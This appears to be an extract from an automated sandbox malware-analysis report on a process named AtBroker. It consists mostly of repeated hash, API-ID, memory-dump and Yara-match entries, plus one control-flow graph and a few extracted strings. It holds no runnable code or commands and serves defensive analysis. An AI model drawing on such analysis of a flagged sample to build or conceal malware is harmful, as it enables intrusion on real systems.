                                            • Opcode Fuzzy Hash: 58997aae9d8486c9a7a376f27e19df5a2947a73593c46f07b1a98e366538a094
                                            • Instruction Fuzzy Hash: E7900221242041527D45B598490450740069BE02D57D1C41AB2405E50CC63AE856E661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 6bda4062aeb39b7f21d0bceedca325f3ef570984ef810241eddc8c45836cf6d1
                                            • Instruction ID: aa4b58abc31dfc4a3d30ec3e5775ffb4c40866cfdf0e28d21df7ccf4d562e121
                                            • Opcode Fuzzy Hash: 6bda4062aeb39b7f21d0bceedca325f3ef570984ef810241eddc8c45836cf6d1
                                            • Instruction Fuzzy Hash: 1E90022921300002F9807598590860A00058BD1296FD1D81DB1006A58CCA29D8696361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 951f7d527d8328c22a5abb5dc9630ea296590f87545a28e6a615dc1b94e5706d
                                            • Instruction ID: a0b34c6faf1cacc84eba23fd9556ffeaeeadcfa74e9b90abc94124f7db9605e4
                                            • Opcode Fuzzy Hash: 951f7d527d8328c22a5abb5dc9630ea296590f87545a28e6a615dc1b94e5706d
                                            • Instruction Fuzzy Hash: 5390022130100003F940759859186064005DBE1395F91D419F1405A54CDA29D8566262
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ddbaab400d805aedbb6f6408161c08f79a0492c68ef4be51d6ccc376ac004924
                                            • Instruction ID: 8bd960747b7fe2f17544c9f74cbde2e8a5a40567dd2af37f104e20742129889f
                                            • Opcode Fuzzy Hash: ddbaab400d805aedbb6f6408161c08f79a0492c68ef4be51d6ccc376ac004924
                                            • Instruction Fuzzy Hash: E290022160100502F90175984904616000A8BD02D5FD1C42AB2015A55ECB39D992B171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 18a6c5b25ca47c41982f586e56e996bbcf1cf74408efc40d3fcba5a706cb0aa8
                                            • Instruction ID: d04b4ff4ca43e2dd71f896f88249c8f8e88426f9d62c5c1b8e58cd6a988d4279
                                            • Opcode Fuzzy Hash: 18a6c5b25ca47c41982f586e56e996bbcf1cf74408efc40d3fcba5a706cb0aa8
                                            • Instruction Fuzzy Hash: B490023120100413F91175984A0470700098BD02D5FD1C81AB1415A58DD76AD952B161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d94608c931fc35ec3000e17e8a3b4c79a722e066f713e15f87a62b19ea877f4d
                                            • Instruction ID: e2f556627a67a0e4cebc31d67ebdcd28d9e9edd27e93ab3ced9a55e7c3b78828
                                            • Opcode Fuzzy Hash: d94608c931fc35ec3000e17e8a3b4c79a722e066f713e15f87a62b19ea877f4d
                                            • Instruction Fuzzy Hash: D590022160100042694075A88D449064005AFE12A5791C529B1989A50DC66DD86566A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8e015669da0e45fbc63d5f98504d586cf10f7d46142e62e282dea30f05b66b6d
                                            • Instruction ID: d167d393cabfbc825505561c01faafa75ca3a767689ac16cd0a46cffe5e3fe3e
                                            • Opcode Fuzzy Hash: 8e015669da0e45fbc63d5f98504d586cf10f7d46142e62e282dea30f05b66b6d
                                            • Instruction Fuzzy Hash: A090026120140403F94079984D0460700058BD0396F91C419B3055A55ECB3DDC517175
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 19f1a5012fdc34c7ebb7a9df5f3fe6eb2b6183ef6f4020799344abcf31d79dfe
                                            • Instruction ID: b0190e6a1d56a1c06a06eb18ee282d97762a07fd9ee98864fa9085520856735a
                                            • Opcode Fuzzy Hash: 19f1a5012fdc34c7ebb7a9df5f3fe6eb2b6183ef6f4020799344abcf31d79dfe
                                            • Instruction Fuzzy Hash: B290026134100442F90075984914B060005CBE1395F91C41DF2055A54DC72DDC527166
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0d61659a8363de4f6021c13b49fd1841fd67c175a7614c1709e04e664ec1e4ad
                                            • Instruction ID: 6a2414db61576ec5be6e4894e57a30d4bf9f7ac636a4d214a2041be23fc94554
                                            • Opcode Fuzzy Hash: 0d61659a8363de4f6021c13b49fd1841fd67c175a7614c1709e04e664ec1e4ad
                                            • Instruction Fuzzy Hash: 7490022124100802F940759889147070006CBD0695F91C419B1015A54DC72AD96576F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 01ff6e4fb061832a1caae250e4aeb25e8ed498f9fd23271a0be041a305ae05ae
                                            • Instruction ID: aa07b84f40961ce5bf7534e2ec0ae71af75adbf2179ada644f4d59e45a63c4c1
                                            • Opcode Fuzzy Hash: 01ff6e4fb061832a1caae250e4aeb25e8ed498f9fd23271a0be041a305ae05ae
                                            • Instruction Fuzzy Hash: 5E90022121180042FA0079A84D14B0700058BD0397F91C51DB1145A54CCA29D8616561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: bef982dec27cb7b2337237b9864b77a37767cecb91eceee5c36f72e8c05cdb09
                                            • Instruction ID: b7a1541b11626a9f4f2bddec23cbbacfb54bc554c95d85c0aa63a40d28117dee
                                            • Opcode Fuzzy Hash: bef982dec27cb7b2337237b9864b77a37767cecb91eceee5c36f72e8c05cdb09
                                            • Instruction Fuzzy Hash: AA90022124505102F950759C49046164005ABE0295F91C429B1805A94DC669D8557261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 844f7069411e0bc862dfb7417f7a5808cf10fc6c92a12af3b79287b46969ab31
                                            • Instruction ID: 4cf7618db35e108704855d64a606d750ebefe6dcb8cd547d178a27882c1ae98d
                                            • Opcode Fuzzy Hash: 844f7069411e0bc862dfb7417f7a5808cf10fc6c92a12af3b79287b46969ab31
                                            • Instruction Fuzzy Hash: 37900225211000032905B9980B0450700468BD53E5391C429F2006A50CD735D8616161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 04a974158c28ba2489d50b5d4fdca3fb7a8be5d17a5f21086d55b2a71fd07679
                                            • Instruction ID: 3b198295846603014e38dab55e1f91bdda9492c990dc2769de918cf10a4da46d
                                            • Opcode Fuzzy Hash: 04a974158c28ba2489d50b5d4fdca3fb7a8be5d17a5f21086d55b2a71fd07679
                                            • Instruction Fuzzy Hash: C890026120200003690575984914616400A8BE0295B91C429F2005A90DC639D8917165
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5f06c090fa939e59efa88d20553fbd8cea94a378f8abf07398673339695f103f
                                            • Instruction ID: d5eff0ef1e9963f7d0f2cc3eac408ba54be38ddb1a6cb054422783ece97e9c24
                                            • Opcode Fuzzy Hash: 5f06c090fa939e59efa88d20553fbd8cea94a378f8abf07398673339695f103f
                                            • Instruction Fuzzy Hash: DE90023160500802F9507598491474600058BD0395F91C419B1015B54DC769DA5576E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8528836bdfc0eff79c706c2e3b1022f5dd1304d8259441001b9c65ef4f0e5b99
                                            • Instruction ID: 4276ed0b7eaf2ee8f826cf16de00f06be1afde177bfbe0954b70c530a1a7bd59
                                            • Opcode Fuzzy Hash: 8528836bdfc0eff79c706c2e3b1022f5dd1304d8259441001b9c65ef4f0e5b99
                                            • Instruction Fuzzy Hash: 4E900225221000022945B9980B0450B04459BD63E53D1C41DF2407A90CC735D8656361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 62d5b68aa41af74832a04794571e1f5427b6076403a1312160aee539fa3adaea
                                            • Instruction ID: 88cb78c84d8c70fc03ffa80209925c69c3c36b43e68e5cbac40ea0ecff86bf24
                                            • Opcode Fuzzy Hash: 62d5b68aa41af74832a04794571e1f5427b6076403a1312160aee539fa3adaea
                                            • Instruction Fuzzy Hash: 0390023120100842F90075984904B4600058BE0395F91C41EB1115B54DC729D8517561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3a9cbf1e55d40912e76d9390fd93fe4ca792dc534e23626cc2ae892ffe9767d1
                                            • Instruction ID: f10fa78c5070b101d07816c750ad4f9c93d8967e656b66133d674d935160923f
                                            • Opcode Fuzzy Hash: 3a9cbf1e55d40912e76d9390fd93fe4ca792dc534e23626cc2ae892ffe9767d1
                                            • Instruction Fuzzy Hash: C490023120108802F9107598890474A00058BD0395F95C819B5415B58DC7A9D8917161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ea4f9a5e825c66f2d0d7b525caa777dd4bb3670a75ef6f7280da928cf282371f
                                            • Instruction ID: e706df4b2cd3da0597bd36dcfce1bf7ab15ef7666379422cfaee487366c86341
                                            • Opcode Fuzzy Hash: ea4f9a5e825c66f2d0d7b525caa777dd4bb3670a75ef6f7280da928cf282371f
                                            • Instruction Fuzzy Hash: 7590023120100402F90079D8590864600058BE0395F91D419B6015A55EC779D8917171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 359fe745acff9657fd07c9dc4b462f70a0fa2d4040b3e15025453f266d5ba036
                                            • Instruction ID: 03c7f4b1d80f5f5e1870a4357ca42f5b96cee8b26daad58dc3373b0cd5f28bfe
                                            • Opcode Fuzzy Hash: 359fe745acff9657fd07c9dc4b462f70a0fa2d4040b3e15025453f266d5ba036
                                            • Instruction Fuzzy Hash: 4690023120504842F94075984904A4600158BD0399F91C419B1055B94DD739DD55B6A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e3697a333da53898776e86db05eced75c90529a96596f5012d5ad930b284181f
                                            • Instruction ID: f3b701c5f35aef69e738110c15eac728eae42013a2210b6af871e6c45f5ac3f1
                                            • Opcode Fuzzy Hash: e3697a333da53898776e86db05eced75c90529a96596f5012d5ad930b284181f
                                            • Instruction Fuzzy Hash: DD90023120100802F9807598490464A00058BD1395FD1C41DB1016B54DCB29DA5977E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 27 2aaadd8-2aaadda 28 2aaae4a-2aab176 27->28 29 2aaaddc-2aaae11 call 2aa1400 call 2ac2610 27->29 30 2aab17d-2aab184 28->30 45 2aaae13-2aaae2f call 2acc0a7 CreateThread 29->45 46 2aaae30-2aaae35 29->46 32 2aab1b6-2aab1c0 30->32 33 2aab186-2aab1b4 30->33 35 2aab1d1-2aab1d8 32->35 33->30 37 2aab1da-2aab201 35->37 38 2aab203-2aab20a 35->38 37->35 41 2aab20c-2aab23f 38->41 42 2aab241-2aab24b 38->42 41->38 44 2aab25c-2aab268 42->44 47 2aab26a-2aab27d 44->47 48 2aab27f 44->48 47->44 51 2aab286-2aab28f 48->51 53 2aab2ab-2aab2bc 51->53 54 2aab291-2aab2a9 51->54 55 2aab2cd-2aab2d9 53->55 54->51 56 2aab2db-2aab2ea 55->56 57 2aab2ec-2aab2f6 55->57 56->55 59 2aab32a-2aab32e 57->59 60 2aab2f8-2aab317 57->60 63 2aab349-2aab350 59->63 64 2aab330-2aab347 59->64 61 2aab328 60->61 62 2aab319-2aab322 60->62 61->57 62->61 65 2aab3a2-2aab3e5 63->65 66 2aab352-2aab372 63->66 64->59 69 2aab3f6-2aab3ff 65->69 67 2aab379-2aab37b 66->67 68 2aab374-2aab378 66->68 70 2aab38c-2aab3a0 67->70 71 2aab37d-2aab386 67->71 68->67 72 2aab40f-2aab413 69->72 73 2aab401-2aab40d 69->73 70->63 71->70 75 2aab41f 72->75 76 2aab415-2aab41c 72->76 73->69 77 2aab426-2aab42f 75->77 76->75 78 2aab63f-2aab646 77->78 79 2aab435-2aab43f 77->79 81 2aab64c call 2aca740 78->81 82 2aab742-2aab74c 78->82 80 2aab450-2aab459 79->80 83 2aab45b-2aab468 80->83 84 2aab475-2aab479 80->84 88 2aab651-2aab655 81->88 86 2aab46a-2aab470 83->86 87 2aab473 83->87 89 2aab47b-2aab4a0 84->89 90 2aab4a2-2aab4ac 84->90 86->87 87->80 92 2aab678-2aab682 88->92 93 2aab657-2aab676 88->93 89->84 94 2aab4bd-2aab4c6 90->94 95 2aab693-2aab69f 92->95 93->88 96 2aab4c8-2aab4da 94->96 97 2aab4dc-2aab4df 94->97 100 2aab6a1-2aab6b4 95->100 101 2aab6b6-2aab6bd 95->101 96->94 99 2aab4e5-2aab4ec 97->99 104 2aab4ee-2aab521 99->104 105 2aab523-2aab532 99->105 100->95 102 2aab6e9-2aab6ed 101->102 103 2aab6bf-2aab6e7 101->103 107 2aab6ef-2aab714 102->107 108 2aab716-2aab71d 102->108 103->101 104->99 109 2aab539-2aab543 105->109 110 2aab534 105->110 107->102 108->82 111 2aab71f-2aab735 108->111 112 2aab554-2aab55d 109->112 110->78 113 2aab740 111->113 114 2aab737-2aab73d 111->114 115 2aab55f-2aab56b 112->115 116 2aab56d-2aab574 112->116 113->108 114->113 115->112 118 2aab576-2aab593 116->118 119 2aab595-2aab5a9 116->119 118->116 120 2aab5ba-2aab5c6 119->120 121 2aab5c8-2aab5d5 120->121 122 2aab5d7-2aab5e3 120->122 121->120 123 2aab602-2aab60c 122->123 124 2aab5e5-2aab600 122->124 126 2aab61d-2aab629 123->126 124->122 127 2aab63a 126->127 128 2aab62b-2aab638 126->128 127->77 128->126
                                            APIs
                                            • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 02AAAE25
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID: "R$,9$.|$9V$F)$Fq$G$H$Kb$Le$U$V`$W$a@$b$e$f$m$t[$u
                                            • API String ID: 2422867632-2431676184
                                            • Opcode ID: 8bb03e39e95926fb6736eb42839aa0df54961515b2b7dfcba2f303c048859d57
                                            • Instruction ID: 1890e4c97660118b10700fb01c561b95cbc0ec97075fd0da186db14f2efdd09d
                                            • Opcode Fuzzy Hash: 8bb03e39e95926fb6736eb42839aa0df54961515b2b7dfcba2f303c048859d57
                                            • Instruction Fuzzy Hash: 4F916CB0905668DBFB208F55CD58BDEBBB1BB45308F1085D8D15D3B281CBBA1A89CF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 73f41f5ed9d4e79717591c67cd1112c79fd23a743002c3a7c86a0f526e232455
                                            • Instruction ID: 78532766866c6810b4285a067489b930817b6a53da94bc61b0b6b0d2edf13736
                                            • Opcode Fuzzy Hash: 73f41f5ed9d4e79717591c67cd1112c79fd23a743002c3a7c86a0f526e232455
                                            • Instruction Fuzzy Hash: 6B318BB1640704ABD724DF64C884FE6BBA9FB88314F10862DE91D9B245DB74BA04CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 93ba2d0d12732cd20cbfc05d75961f00bf49d8ad432b38d2668e72f093ca5699
                                            • Instruction ID: 2ab373e23203f608ab3325b6c17f1650debae4f892a02f93ed66ff5c06f38bea
                                            • Opcode Fuzzy Hash: 93ba2d0d12732cd20cbfc05d75961f00bf49d8ad432b38d2668e72f093ca5699
                                            • Instruction Fuzzy Hash: 1531A171681704ABDB24DF64C884FE6BBB9FF48314F10462CE91D6B245DB74A544CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 18e000c5b4f24d4ae014f58960fbf0010f7920956f88e7b948f09d7382efa3e5
                                            • Instruction ID: fcb4430896e17f38b74da86cb0c3b1793dae9e76f3840c6cf0513f5aa7ee6e49
                                            • Opcode Fuzzy Hash: 18e000c5b4f24d4ae014f58960fbf0010f7920956f88e7b948f09d7382efa3e5
                                            • Instruction Fuzzy Hash: 193121B1685705ABDB24CF64C884FE6FBB9FF88304F20866DE91D5B245CB706600CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 02ABFF87
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Initialize
                                            • String ID: @J7<
                                            • API String ID: 2538663250-2016760708
                                            • Opcode ID: 711062f297918000abe97d6ef17cc92611ac82e88cf66a9ec5468ed56575c836
                                            • Instruction ID: 74fa99085f5a1982150aec1a561b3350e7ac4855fd7367728dc0541f212f7435
                                            • Opcode Fuzzy Hash: 711062f297918000abe97d6ef17cc92611ac82e88cf66a9ec5468ed56575c836
